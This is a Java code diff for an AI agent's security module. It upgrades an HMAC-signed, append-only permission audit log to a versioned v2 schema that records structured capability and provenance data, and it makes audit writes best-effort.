@@ -146,7 +146,7 @@ public final class PermissionManager {
                 log.debug("Permission auto-approved (session blanket): key={}, sessionId={}",
                         allowlistKey, sessionIdOrNull);
                 var decision = new PermissionDecision.Approved();
-                audit(allowlistKey, capability.risk(), sessionIdOrNull, decision, "session-blanket-approval");
+                audit(allowlistKey, capability, provenance, decision, "session-blanket-approval");
                 return decision;
             }
         }
@@ -158,27 +158,42 @@ public final class PermissionManager {
         log.debug("Permission check: key={}, level={}, sessionId={}, decision={}",
                 allowlistKey, capability.risk(), sessionIdOrNull,
                 decision.getClass().getSimpleName());
-        audit(allowlistKey, capability.risk(), sessionIdOrNull, decision, null);
+        audit(allowlistKey, capability, provenance, decision, null);
         return decision;
     }
 
     /**
-     * Writes one entry to the audit log if one is attached. Flattens
-     * the sealed {@link PermissionDecision} into the on-disk string
-     * form ({@code APPROVED} / {@code DENIED} / {@code NEEDS_APPROVAL})
-     * and chooses the {@code reason} field: caller-supplied note
-     * (for the session-blanket branch), the denial reason (for
-     * Denied), the prompt (for NeedsUserApproval), or null.
+     * Writes one v2 audit entry — structured {@link Capability} and full
+     * {@link Provenance} (#480 PR 3). Flattens the sealed
+     * {@link PermissionDecision} into the on-disk string form
+     * ({@code APPROVED} / {@code DENIED} / {@code NEEDS_APPROVAL}) and
+     * chooses the {@code reason} field: caller-supplied note (for the
+     * session-blanket branch), the denial reason (for Denied), the prompt
+     * (for NeedsUserApproval), or null.
      *
-     * <p>Audit shape is still v1 (flat fields) in PR 2 — PR 3 will swap
-     * in a structured form that carries the {@link Capability} and
-     * {@link Provenance} directly. For now we project them down to the
-     * v1 fields {@code (toolName, level)}.
+     * <p>The on-disk record carries:
+     *
+     * <ul>
+     *   <li>{@code allowlistKey} → {@code toolName} field — keeps v1 query
+     *       tooling that filters by tool name working unchanged across the
+     *       schema bump (e.g. "show me all bash decisions" still works).</li>
+     *   <li>{@code capability.risk()} → {@code level} field — same reason.
+     *       For migrated tools this matches the variant's structural risk
+     *       (and reflects {@code BashExec}'s self-escalation to
+     *       {@code DANGEROUS}); for legacy callers (the
+     *       {@link #check(PermissionRequest, String)} shim wraps as
+     *       {@link Capability.LegacyToolUse}) it carries the
+     *       declared level.</li>
+     *   <li>{@code capability} and {@code provenance} → typed JSON nested
+     *       objects, so PolicyEngine and the dashboard timeline see paths,
+     *       URLs, plan-step IDs, etc. directly without having to parse the
+     *       human prompt.</li>
+     * </ul>
      */
     private void audit(
             String allowlistKey,
-            PermissionLevel risk,
-            String sessionId,
+            Capability capability,
+            Provenance provenance,
             PermissionDecision decision,
             String approvalNote) {
         if (auditLog == null) return;
@@ -198,7 +213,7 @@ public final class PermissionManager {
                 reason = n.prompt();
             }
         }
-        auditLog.record(Instant.now(), sessionId, allowlistKey, risk, kind, reason);
+        auditLog.record(Instant.now(), allowlistKey, capability, provenance, kind, reason);
     }
 
     /**

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/PermissionManager.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/PermissionManager.java
@@ -197,23 +197,35 @@ public final class PermissionManager {
             PermissionDecision decision,
             String approvalNote) {
         if (auditLog == null) return;
-        String kind;
-        String reason;
-        switch (decision) {
-            case PermissionDecision.Approved _ -> {
-                kind = "APPROVED";
-                reason = approvalNote;
+        // Audit is best-effort by contract — a degraded log must not abort
+        // the agent. CapabilityAuditLog.appendEntry already swallows
+        // IOException internally, but the v2 path's signablePayload(...)
+        // can surface a serialisation IllegalStateException through here,
+        // and any other unchecked exception would propagate out of the
+        // permission check. Wrap the whole branch so audit failures
+        // produce a warning, not a turn-killing error.
+        try {
+            String kind;
+            String reason;
+            switch (decision) {
+                case PermissionDecision.Approved _ -> {
+                    kind = "APPROVED";
+                    reason = approvalNote;
+                }
+                case PermissionDecision.Denied d -> {
+                    kind = "DENIED";
+                    reason = d.reason();
+                }
+                case PermissionDecision.NeedsUserApproval n -> {
+                    kind = "NEEDS_APPROVAL";
+                    reason = n.prompt();
+                }
             }
-            case PermissionDecision.Denied d -> {
-                kind = "DENIED";
-                reason = d.reason();
-            }
-            case PermissionDecision.NeedsUserApproval n -> {
-                kind = "NEEDS_APPROVAL";
-                reason = n.prompt();
-            }
+            auditLog.record(Instant.now(), allowlistKey, capability, provenance, kind, reason);
+        } catch (RuntimeException auditFailure) {
+            log.warn("Audit log write failed for tool={}, level={}: {}",
+                    allowlistKey, capability.risk(), auditFailure.getMessage());
         }
-        auditLog.record(Instant.now(), allowlistKey, capability, provenance, kind, reason);
     }
 
     /**

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/ProvenanceLink.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/ProvenanceLink.java
@@ -19,7 +19,10 @@ import java.util.Objects;
  * {@code switch} with no default — adding a new kind of link forces every
  * consumer to update.
  */
-@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "kind")
+// {@code "@type"} (not {@code "kind"}) for the same collision-avoidance
+// reason as {@link Capability} — the discriminator name must not match
+// any variant's record component.
+@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "@type")
 @JsonSubTypes({
         @JsonSubTypes.Type(value = ProvenanceLink.PlanStepEntered.class, name = "PlanStepEntered"),
         @JsonSubTypes.Type(value = ProvenanceLink.SubAgentSpawned.class, name = "SubAgentSpawned"),

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/ProvenanceLink.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/ProvenanceLink.java
@@ -1,5 +1,7 @@
 package dev.aceclaw.security;
 
+import com.fasterxml.jackson.annotation.JsonSubTypes;
+import com.fasterxml.jackson.annotation.JsonTypeInfo;
 import dev.aceclaw.security.ids.PlanStepId;
 
 import java.time.Instant;
@@ -17,6 +19,12 @@ import java.util.Objects;
  * {@code switch} with no default — adding a new kind of link forces every
  * consumer to update.
  */
+@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "kind")
+@JsonSubTypes({
+        @JsonSubTypes.Type(value = ProvenanceLink.PlanStepEntered.class, name = "PlanStepEntered"),
+        @JsonSubTypes.Type(value = ProvenanceLink.SubAgentSpawned.class, name = "SubAgentSpawned"),
+        @JsonSubTypes.Type(value = ProvenanceLink.RetryAttempt.class, name = "RetryAttempt"),
+})
 public sealed interface ProvenanceLink {
 
     /** Wall-clock instant the link was recorded. */

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/SearchKind.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/SearchKind.java
@@ -1,0 +1,23 @@
+package dev.aceclaw.security;
+
+/**
+ * Distinguishes the three flavors of {@link Capability.FileSearch} so a
+ * "no recursive grep on /etc" policy can refuse content searches without
+ * having to also forbid filename-only listings, and an audit reader can
+ * tell at a glance what the agent was looking for.
+ *
+ * <ul>
+ *   <li>{@code GLOB} — filename pattern match (e.g. {@code **\/*.java}).
+ *       Walks the tree but only inspects names. Cheaper, no content read.</li>
+ *   <li>{@code GREP} — content pattern match. Opens every matching file
+ *       and reads its bytes; policies that care about secret-bearing files
+ *       (.env, credentials) should treat this as more sensitive than {@code GLOB}.</li>
+ *   <li>{@code LIST} — single-directory listing. No recursion, no content.
+ *       The lowest-impact form.</li>
+ * </ul>
+ */
+public enum SearchKind {
+    GLOB,
+    GREP,
+    LIST
+}

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/audit/CapabilityAuditEntry.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/audit/CapabilityAuditEntry.java
@@ -1,44 +1,51 @@
 package dev.aceclaw.security.audit;
 
+import com.fasterxml.jackson.annotation.JsonInclude;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import dev.aceclaw.security.Capability;
 import dev.aceclaw.security.PermissionLevel;
+import dev.aceclaw.security.Provenance;
 
 import java.time.Instant;
 import java.util.Objects;
 
 /**
- * One signed record in the capability audit log (#465 Layer 8 v1).
+ * One signed record in the capability audit log (#465 Layer 8).
  *
- * <p>Today every {@link dev.aceclaw.security.PermissionManager#check} call
- * produces an entry. When the runtime-governance epic later introduces
- * {@code CapabilityRequest}, those richer requests will produce richer
- * entries — but this v1 schema covers the single most-asked-for thing:
- * a tamper-evident record of every permission decision the daemon made.
- *
- * <h3>Schema</h3>
+ * <h3>Schema versions</h3>
  *
  * <ul>
- *   <li>{@code timestamp} — wall-clock instant of the decision (ISO-8601
- *       on the wire).</li>
- *   <li>{@code sessionId} — owning session, or {@code null} for daemon-
- *       internal checks that don't belong to any session.</li>
- *   <li>{@code toolName} — the tool the request was for.</li>
- *   <li>{@code level} — the request's {@link PermissionLevel} (READ / WRITE
- *       / EXECUTE / DANGEROUS).</li>
- *   <li>{@code decisionKind} — the resulting decision flattened to a
- *       string ({@code "APPROVED"} / {@code "DENIED"} /
- *       {@code "NEEDS_APPROVAL"}). Strings instead of the sealed type
- *       so the on-disk format isn't tied to the JVM type identity.</li>
- *   <li>{@code reason} — denial / approval reason, or {@code null}.</li>
- *   <li>{@code signature} — HMAC-SHA256 hex of every other field,
- *       computed via {@link AuditLogSigner}. Verified on read; an entry
- *       with a bad signature has been tampered with (or written by a
- *       different installation's key) and gets dropped from query
- *       results.</li>
+ *   <li><strong>v1</strong> — flat {@code (toolName, level)} only. Written
+ *       by every PR-2-era {@code PermissionManager.check} call and by the
+ *       legacy {@code check(PermissionRequest, ...)} shim. Still readable
+ *       indefinitely so existing logs survive the schema bump.</li>
+ *   <li><strong>v2</strong> — adds the structured {@link Capability} variant
+ *       and the originating {@link Provenance}. Written by
+ *       {@code PermissionManager.check(Capability, Provenance, ...)} when
+ *       an audit log is attached. Carries the typed payload PolicyEngine
+ *       and the dashboard timeline want; the legacy {@code (toolName, level)}
+ *       fields are still populated as a denormalised lookup so v1-era query
+ *       tooling that filters by tool name keeps working.</li>
  * </ul>
  *
- * <p>The signed payload is assembled by {@link #signablePayload()} —
- * the same implementation must be used by signer and verifier. Field
- * order matters for HMAC reproducibility; see that method's doc.
+ * <h3>Why both flat fields AND structured payload</h3>
+ *
+ * Migration safety. A query tool that filters by {@code toolName == "bash"}
+ * (the v1 contract) keeps working against v2 entries because we still
+ * populate that field — using the originating tool's name (e.g.
+ * {@code "write_file"}) rather than a synthesised label. The
+ * {@code capability} field gives the structured detail callers can opt into
+ * when they're ready to switch.
+ *
+ * <h3>HMAC payload versioning</h3>
+ *
+ * The signed payload is built by {@link #signablePayload(ObjectMapper)} and
+ * branches on {@code schemaVersion}: v1 entries verify under the original
+ * {@code |}-joined string used since the audit log existed; v2 appends the
+ * canonicalised JSON of {@code capability} and {@code provenance}. Because
+ * each entry carries its own {@code schemaVersion}, the same key signs and
+ * verifies entries from both eras without rotation.
  */
 public record CapabilityAuditEntry(
         Instant timestamp,
@@ -47,7 +54,21 @@ public record CapabilityAuditEntry(
         PermissionLevel level,
         String decisionKind,
         String reason,
-        String signature) {
+        String signature,
+        // v2 additions: nullable on v1-era entries.
+        @JsonInclude(JsonInclude.Include.NON_NULL)
+        Capability capability,
+        @JsonInclude(JsonInclude.Include.NON_NULL)
+        Provenance provenance,
+        // schemaVersion: 1 for legacy entries (capability/provenance null);
+        // 2 for entries written via the structured-record overload.
+        int schemaVersion) {
+
+    /** Schema version constant for v1 (flat) entries. */
+    public static final int SCHEMA_V1 = 1;
+
+    /** Schema version constant for v2 (structured) entries. */
+    public static final int SCHEMA_V2 = 2;
 
     public CapabilityAuditEntry {
         Objects.requireNonNull(timestamp, "timestamp");
@@ -55,51 +76,161 @@ public record CapabilityAuditEntry(
         Objects.requireNonNull(level, "level");
         Objects.requireNonNull(decisionKind, "decisionKind");
         Objects.requireNonNull(signature, "signature");
-        // sessionId and reason intentionally nullable — captured above.
+        // sessionId, reason, capability, provenance intentionally nullable.
+        if (schemaVersion != SCHEMA_V1 && schemaVersion != SCHEMA_V2) {
+            throw new IllegalArgumentException(
+                    "schemaVersion must be " + SCHEMA_V1 + " or " + SCHEMA_V2 + "; got " + schemaVersion);
+        }
+        if (schemaVersion == SCHEMA_V2) {
+            Objects.requireNonNull(capability,
+                    "v2 entries require a non-null capability");
+            Objects.requireNonNull(provenance,
+                    "v2 entries require a non-null provenance");
+        }
+        // v1 entries SHOULD have capability/provenance null. We don't enforce
+        // (defensive: a future migration may want to upgrade in place), but
+        // signablePayload() ignores those fields for v1, so signing/verify is
+        // unambiguous.
     }
 
     /**
-     * Returns this entry with {@code signature} replaced. Package-
-     * private on purpose — only {@link CapabilityAuditLog} should use
-     * it, as part of the build-then-sign flow. Exposing this publicly
-     * would let callers craft signed entries off-the-side, bypassing
-     * the audit log's lock and write path.
+     * Backward-compatible 7-arg constructor for v1 entries. Defaults
+     * {@code schemaVersion} to {@link #SCHEMA_V1} and leaves
+     * {@code capability}/{@code provenance} null. Used by the legacy
+     * {@link CapabilityAuditLog#record(Instant, String, String, PermissionLevel,
+     * String, String)} entry point and by every existing test that pre-dates
+     * the v2 fields.
+     */
+    public CapabilityAuditEntry(
+            Instant timestamp,
+            String sessionId,
+            String toolName,
+            PermissionLevel level,
+            String decisionKind,
+            String reason,
+            String signature) {
+        this(timestamp, sessionId, toolName, level, decisionKind, reason, signature,
+                null, null, SCHEMA_V1);
+    }
+
+    /**
+     * Convenience factory for a v2 entry — fills the v1 denormalised fields
+     * from the {@link Capability} so legacy query tools still see populated
+     * {@code toolName}/{@code level}. {@code allowlistKey} is what the
+     * dispatcher passed to {@link dev.aceclaw.security.PermissionManager} as
+     * the per-session approval key (typically the originating tool's name);
+     * we record it as {@code toolName} so existing "always allow X" reports
+     * group consistently with v1.
+     */
+    public static CapabilityAuditEntry v2(
+            Instant timestamp,
+            String allowlistKey,
+            Capability capability,
+            Provenance provenance,
+            String decisionKind,
+            String reason,
+            String signature) {
+        Objects.requireNonNull(allowlistKey, "allowlistKey");
+        Objects.requireNonNull(capability, "capability");
+        Objects.requireNonNull(provenance, "provenance");
+        String sessionId = provenance.sessionId().map(s -> s.value()).orElse(null);
+        return new CapabilityAuditEntry(
+                timestamp,
+                sessionId,
+                allowlistKey,
+                capability.risk(),
+                decisionKind,
+                reason,
+                signature,
+                capability,
+                provenance,
+                SCHEMA_V2);
+    }
+
+    /**
+     * Returns this entry with {@code signature} replaced. Package-private —
+     * only {@link CapabilityAuditLog} uses it as part of build-then-sign.
+     * Public exposure would let callers craft signed entries off-the-side
+     * and bypass the log's lock and write path.
      */
     CapabilityAuditEntry withSignature(String newSignature) {
         return new CapabilityAuditEntry(
-                timestamp, sessionId, toolName, level, decisionKind, reason, newSignature);
+                timestamp, sessionId, toolName, level, decisionKind, reason, newSignature,
+                capability, provenance, schemaVersion);
     }
 
     /**
-     * Returns the canonical string used as the HMAC input. Encoding
-     * is length-prefixed so that no choice of nullable / variable-width
-     * field values can collide:
+     * Returns the canonical string used as the HMAC input.
      *
+     * <p>v1 layout (preserved bit-for-bit so old entries verify):
      * <pre>
-     *   nullable string s → "-" if null, else "&lt;codeUnitLength&gt;:&lt;s&gt;"
-     *   non-null fields   → ":&lt;value&gt;" (length omitted, fixed shape)
-     *   joined with the literal pipe '|' character
+     *   :&lt;timestamp&gt;|&lt;sessionId|len-prefixed or "-"&gt;|&lt;toolName|len-prefixed&gt;
+     *   |:&lt;level&gt;|:&lt;decisionKind&gt;|&lt;reason|len-prefixed or "-"&gt;
      * </pre>
      *
-     * <p>The earlier scheme used tab-joined raw values with the
-     * literal string {@code "null"} for absent fields, which let
-     * {@code sessionId = null} collide with {@code sessionId = "null"},
-     * and let a tab inside a {@code reason} collide with the
-     * separator. The length prefix on each nullable field makes both
-     * collision classes impossible: an attacker can no longer forge
-     * one entry's signature into another.
+     * <p>v2 layout (v1 prefix + canonical capability + canonical provenance):
+     * <pre>
+     *   &lt;v1 layout&gt;|:v2|&lt;capabilityJson|len-prefixed&gt;|&lt;provenanceJson|len-prefixed&gt;
+     * </pre>
      *
-     * <p>Field order is fixed; any rearrangement here MUST be matched
-     * on the verifier side.
+     * <p>The {@code :v2} marker is the boundary between v1's flat fields and
+     * the new structured tail. It serves two purposes: (a) signature
+     * deterministic boundary if a future v3 needs to slot in more fields,
+     * and (b) prevents a forged v1 entry from masquerading as v2 by
+     * appending crafted bytes — the marker would have to land at the
+     * v2 boundary <em>and</em> the appended payload's length-prefix would
+     * have to verify, which can't be done without the HMAC key.
+     *
+     * <p>The {@code canonicalMapper} should be configured to sort properties
+     * alphabetically; {@link CapabilityAuditLog} provides one. Sorted JSON
+     * is what makes the v2 payload deterministic regardless of variant
+     * field order — without it, two records with semantically equal
+     * capabilities could disagree on byte order and one would fail to
+     * verify.
+     */
+    /**
+     * No-arg overload usable only for {@link #SCHEMA_V1} entries — those
+     * have no {@link Capability} or {@link Provenance} to canonicalise, so
+     * no mapper is needed. v2 entries throw {@link IllegalStateException}
+     * here; callers that handle v2 must use
+     * {@link #signablePayload(ObjectMapper)}. Kept around so the existing
+     * v1-only tests (collision sentinels) and any v1-only consumers don't
+     * have to thread a canonical mapper through.
      */
     public String signablePayload() {
-        return String.join("|",
+        if (schemaVersion != SCHEMA_V1) {
+            throw new IllegalStateException(
+                    "signablePayload() with no mapper is only valid for v1 entries; "
+                            + "v" + schemaVersion + " entries must use signablePayload(ObjectMapper)");
+        }
+        return signablePayload(null);
+    }
+
+    public String signablePayload(ObjectMapper canonicalMapper) {
+        String base = String.join("|",
                 ":" + timestamp.toString(),
                 encodeNullable(sessionId),
                 encodeLen(toolName),
                 ":" + level.name(),
                 ":" + decisionKind,
                 encodeNullable(reason));
+        if (schemaVersion == SCHEMA_V1) {
+            return base;
+        }
+        // v2: capability + provenance both required (constructor enforced).
+        try {
+            String capJson = canonicalMapper.writeValueAsString(capability);
+            String provJson = canonicalMapper.writeValueAsString(provenance);
+            return base + "|:v2|" + encodeLen(capJson) + "|" + encodeLen(provJson);
+        } catch (Exception e) {
+            // Serialisation should not fail for in-memory records, but if it
+            // does we cannot produce a deterministic payload — surface
+            // explicitly rather than write an unsigned (or worse,
+            // non-reproducibly-signed) entry.
+            throw new IllegalStateException(
+                    "Failed to canonicalise capability/provenance for HMAC payload: "
+                            + e.getMessage(), e);
+        }
     }
 
     private static String encodeNullable(String s) {
@@ -107,9 +238,19 @@ public record CapabilityAuditEntry(
     }
 
     private static String encodeLen(String s) {
-        // Length is char-count of the canonical string; HMAC then
-        // operates on the UTF-8 bytes of the whole joined payload,
-        // so any unicode in the value is folded in unchanged.
         return s.length() + ":" + s;
+    }
+
+    /**
+     * Reconstructs schema version from a parsed JSON node — used by the
+     * read path to detect v1 entries written before {@link #schemaVersion}
+     * existed as a field. v1 entries on disk lack the {@code schemaVersion}
+     * key entirely; the read path treats absence as {@link #SCHEMA_V1}.
+     */
+    static int schemaVersionOf(JsonNode node) {
+        if (node == null) return SCHEMA_V1;
+        var sv = node.get("schemaVersion");
+        if (sv == null || sv.isNull()) return SCHEMA_V1;
+        return sv.asInt(SCHEMA_V1);
     }
 }

--- a/aceclaw-security/src/main/java/dev/aceclaw/security/audit/CapabilityAuditLog.java
+++ b/aceclaw-security/src/main/java/dev/aceclaw/security/audit/CapabilityAuditLog.java
@@ -1,8 +1,14 @@
 package dev.aceclaw.security.audit;
 
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.MapperFeature;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.databind.SerializationFeature;
+import com.fasterxml.jackson.datatype.jdk8.Jdk8Module;
 import com.fasterxml.jackson.datatype.jsr310.JavaTimeModule;
+import dev.aceclaw.security.Capability;
 import dev.aceclaw.security.PermissionLevel;
+import dev.aceclaw.security.Provenance;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -17,25 +23,41 @@ import java.util.Objects;
 import java.util.concurrent.locks.ReentrantLock;
 
 /**
- * Append-only signed audit log for capability decisions (#465 Layer 8 v1).
+ * Append-only signed audit log for capability decisions (#465 Layer 8).
  *
- * <p>Mirrors the {@code InjectionAuditLog} pattern used for memory
- * candidate injections — JSONL on disk, ReentrantLock around append
- * for concurrent virtual threads, lazy directory creation. The
- * differentiator vs. that log is signing: every entry is HMAC-SHA256
- * signed at write time and verified on read. Tampered or wrong-key
- * entries are dropped from query results with a warning so a corrupted
- * file doesn't poison reporting.
+ * <p>Mirrors the {@code InjectionAuditLog} pattern used for memory candidate
+ * injections — JSONL on disk, ReentrantLock around append for concurrent
+ * virtual threads, lazy directory creation. The differentiator vs. that log
+ * is signing: every entry is HMAC-SHA256 signed at write time and verified
+ * on read. Tampered or wrong-key entries are dropped from query results
+ * with a warning so a corrupted file doesn't poison reporting.
  *
- * <p>On-disk location: {@code ~/.aceclaw/audit/capability-audit.jsonl}
- * with the signing key at {@code ~/.aceclaw/audit/audit.key}.
+ * <p>On-disk location: {@code ~/.aceclaw/audit/capability-audit.jsonl} with
+ * the signing key at {@code ~/.aceclaw/audit/audit.key}.
  *
- * <p>This v1 attaches to the existing {@link dev.aceclaw.security.PermissionManager#check}
- * path. When the runtime-governance epic introduces unified
- * {@code CapabilityRequest}, the same log naturally extends to record
- * those richer requests too — schema is forward-additive (new fields
- * are added to {@link CapabilityAuditEntry}'s signable payload, old
- * keys removed only by version bump).
+ * <h3>Schema versions</h3>
+ *
+ * <ul>
+ *   <li><strong>v1</strong> (PR 2 era) — flat {@code (toolName, level)} only,
+ *       no {@code schemaVersion} field on disk. Written by the legacy
+ *       {@link #record(Instant, String, String, PermissionLevel, String, String)
+ *       6-arg overload} and parsed back via the manual JsonNode path so the
+ *       missing fields don't cause record-constructor failures.</li>
+ *   <li><strong>v2</strong> (PR 3) — adds {@link Capability} and
+ *       {@link Provenance} as nested JSON. Written by the new
+ *       {@link #record(Instant, String, Capability, Provenance, String, String)
+ *       7-arg overload}. Both versions coexist in the same file; the read
+ *       path dispatches per-entry.</li>
+ * </ul>
+ *
+ * <h3>Why two ObjectMappers</h3>
+ *
+ * The on-disk JSON ({@link #mapper}) is left in record-declaration order
+ * because that's what humans expect when grepping. The HMAC payload
+ * ({@link #canonicalMapper}) sorts properties alphabetically so two
+ * semantically equal capabilities always produce the same signed bytes —
+ * without that, a record could fail to verify after a JVM upgrade or
+ * Jackson minor version bump that reordered record component output.
  */
 public final class CapabilityAuditLog {
 
@@ -46,15 +68,15 @@ public final class CapabilityAuditLog {
     private final Path auditFile;
     private final AuditLogSigner signer;
     private final ObjectMapper mapper;
+    private final ObjectMapper canonicalMapper;
     private final ReentrantLock writeLock = new ReentrantLock();
 
     /**
-     * Creates an audit log rooted at {@code auditDir}. The directory
-     * and key file are materialised up front — {@code auditDir} is
-     * created if missing and the signing key is written to
-     * {@code audit.key} on first call (POSIX 600 where supported).
-     * Only the JSONL file itself is lazy: it appears on the first
-     * {@link #record} call.
+     * Creates an audit log rooted at {@code auditDir}. The directory and key
+     * file are materialised up front — {@code auditDir} is created if missing
+     * and the signing key is written to {@code audit.key} on first call
+     * (POSIX 600 where supported). Only the JSONL file itself is lazy: it
+     * appears on the first {@link #record} call.
      */
     public static CapabilityAuditLog create(Path auditDir) throws IOException {
         Objects.requireNonNull(auditDir, "auditDir");
@@ -67,15 +89,38 @@ public final class CapabilityAuditLog {
     CapabilityAuditLog(Path auditFile, AuditLogSigner signer) {
         this.auditFile = Objects.requireNonNull(auditFile, "auditFile");
         this.signer = Objects.requireNonNull(signer, "signer");
-        this.mapper = new ObjectMapper().registerModule(new JavaTimeModule());
+        this.mapper = buildMapper(false);
+        this.canonicalMapper = buildMapper(true);
+    }
+
+    private static ObjectMapper buildMapper(boolean canonical) {
+        var m = new ObjectMapper()
+                .registerModule(new JavaTimeModule())
+                .registerModule(new Jdk8Module())
+                .disable(SerializationFeature.WRITE_DATES_AS_TIMESTAMPS);
+        if (canonical) {
+            // Deterministic byte order — sorted property names give the HMAC
+            // a stable input no matter how Jackson decides to emit fields by
+            // default. Without this, an apparently identical entry could
+            // sign to a different hash on another JVM/Jackson minor version
+            // and fail verification on read.
+            m = m.configure(MapperFeature.SORT_PROPERTIES_ALPHABETICALLY, true);
+        }
+        return m;
     }
 
     /**
-     * Signs and appends one decision. The signature is computed over
-     * {@link CapabilityAuditEntry#signablePayload()}, then attached.
-     * Best-effort: an IO failure logs a warning rather than throwing,
-     * because the calling permission check has already produced its
-     * decision and the agent shouldn't be aborted by a degraded log.
+     * Signs and appends one v1 (flat) entry. Best-effort: an IO failure logs
+     * a warning rather than throwing, because the calling permission check
+     * has already produced its decision and the agent shouldn't be aborted
+     * by a degraded log.
+     *
+     * <p>This overload is preserved unchanged from PR 2 so existing callers
+     * keep compiling. Internally it constructs a v1
+     * {@link CapabilityAuditEntry} (capability/provenance null,
+     * {@code schemaVersion = 1}); v1 entries can still be read back
+     * indefinitely since {@link #readVerified()} dispatches on schema
+     * version per-entry.
      */
     public void record(
             Instant timestamp,
@@ -84,21 +129,47 @@ public final class CapabilityAuditLog {
             PermissionLevel level,
             String decisionKind,
             String reason) {
-        // Build with a placeholder signature, sign the canonical
-        // payload, then re-emit with the real signature attached.
-        // Two-step is necessary because the signature is a field of
-        // the entry but is also derived from its other fields.
         var unsigned = new CapabilityAuditEntry(
                 timestamp, sessionId, toolName, level, decisionKind, reason, "unsigned");
-        var entry = unsigned.withSignature(signer.sign(unsigned.signablePayload()));
+        var entry = unsigned.withSignature(signer.sign(unsigned.signablePayload(canonicalMapper)));
         appendEntry(entry);
     }
 
     /**
-     * Returns all entries from the log whose signature verifies under
-     * the current key. Tampered, malformed, or wrong-key entries are
-     * skipped with a warning — they don't fail the read. Order matches
-     * disk order (append order = decision order).
+     * Signs and appends one v2 (structured) entry. {@code allowlistKey} is
+     * the originating tool's name (or whichever key the dispatcher used for
+     * per-session blanket approvals); we record it as the entry's
+     * {@code toolName} so legacy v1 query tools still group correctly.
+     * {@code capability} and {@code provenance} carry the typed payload.
+     *
+     * <p>Best-effort like the v1 overload: IO errors log and return.
+     */
+    public void record(
+            Instant timestamp,
+            String allowlistKey,
+            Capability capability,
+            Provenance provenance,
+            String decisionKind,
+            String reason) {
+        Objects.requireNonNull(capability, "capability");
+        Objects.requireNonNull(provenance, "provenance");
+        var unsigned = CapabilityAuditEntry.v2(
+                timestamp, allowlistKey, capability, provenance, decisionKind, reason, "unsigned");
+        var entry = unsigned.withSignature(signer.sign(unsigned.signablePayload(canonicalMapper)));
+        appendEntry(entry);
+    }
+
+    /**
+     * Returns all entries from the log whose signature verifies under the
+     * current key. Tampered, malformed, or wrong-key entries are skipped
+     * with a warning — they don't fail the read. Order matches disk order
+     * (append order = decision order).
+     *
+     * <p>Mixed-version files are supported: each line is parsed and verified
+     * individually against its own schema. v1 lines (no
+     * {@code schemaVersion} field) parse via the legacy field set; v2 lines
+     * parse the full record including {@code capability} and
+     * {@code provenance}.
      *
      * <p>Returns an empty list if the file doesn't exist yet.
      */
@@ -115,14 +186,14 @@ public final class CapabilityAuditLog {
                 if (line.isBlank()) continue;
                 CapabilityAuditEntry entry;
                 try {
-                    entry = mapper.readValue(line, CapabilityAuditEntry.class);
+                    entry = parseEntry(line);
                 } catch (IOException parseError) {
                     log.warn("Audit log {} line {} is malformed; dropping. cause={}",
                             auditFile, lineNo, parseError.getMessage());
                     dropped++;
                     continue;
                 }
-                if (!signer.verify(entry.signablePayload(), entry.signature())) {
+                if (!signer.verify(entry.signablePayload(canonicalMapper), entry.signature())) {
                     log.warn("Audit log {} line {} failed signature verification; dropping",
                             auditFile, lineNo);
                     dropped++;
@@ -140,6 +211,44 @@ public final class CapabilityAuditLog {
         return verified;
     }
 
+    /**
+     * Per-line dispatch. Reads the JSON, determines schema, builds the right
+     * record. v1 entries lack {@code capability}, {@code provenance}, and
+     * {@code schemaVersion}; we construct them via the 7-arg constructor so
+     * the canonical-constructor's {@code schemaVersion} validation doesn't
+     * reject the {@code 0} default that Jackson would otherwise produce.
+     */
+    private CapabilityAuditEntry parseEntry(String line) throws IOException {
+        JsonNode node = mapper.readTree(line);
+        int schemaVersion = CapabilityAuditEntry.schemaVersionOf(node);
+        if (schemaVersion == CapabilityAuditEntry.SCHEMA_V1) {
+            return new CapabilityAuditEntry(
+                    Instant.parse(requireText(node, "timestamp")),
+                    nullableText(node, "sessionId"),
+                    requireText(node, "toolName"),
+                    PermissionLevel.valueOf(requireText(node, "level")),
+                    requireText(node, "decisionKind"),
+                    nullableText(node, "reason"),
+                    requireText(node, "signature"));
+        }
+        // v2: full record. Jackson maps capability/provenance via the
+        // @JsonTypeInfo annotations on the sealed types.
+        return mapper.treeToValue(node, CapabilityAuditEntry.class);
+    }
+
+    private static String requireText(JsonNode node, String field) throws IOException {
+        var n = node.get(field);
+        if (n == null || n.isNull()) {
+            throw new IOException("missing required field: " + field);
+        }
+        return n.asText();
+    }
+
+    private static String nullableText(JsonNode node, String field) {
+        var n = node.get(field);
+        return (n == null || n.isNull()) ? null : n.asText();
+    }
+
     /** Path to the audit file (may not exist yet if no entries written). */
     public Path auditFile() {
         return auditFile;
@@ -148,9 +257,9 @@ public final class CapabilityAuditLog {
     private void appendEntry(CapabilityAuditEntry entry) {
         writeLock.lock();
         try {
-            // Parent dir was created in factory but tolerate manual
-            // deletion between create() and first record() — a missing
-            // parent directory should not crash the daemon.
+            // Parent dir was created in factory but tolerate manual deletion
+            // between create() and first record() — a missing parent
+            // directory should not crash the daemon.
             Files.createDirectories(auditFile.getParent());
             Files.writeString(auditFile, mapper.writeValueAsString(entry) + "\n",
                     StandardOpenOption.CREATE, StandardOpenOption.APPEND);

--- a/aceclaw-security/src/test/java/dev/aceclaw/security/CapabilityTest.java
+++ b/aceclaw-security/src/test/java/dev/aceclaw/security/CapabilityTest.java
@@ -101,6 +101,46 @@ final class CapabilityTest {
     }
 
     @Test
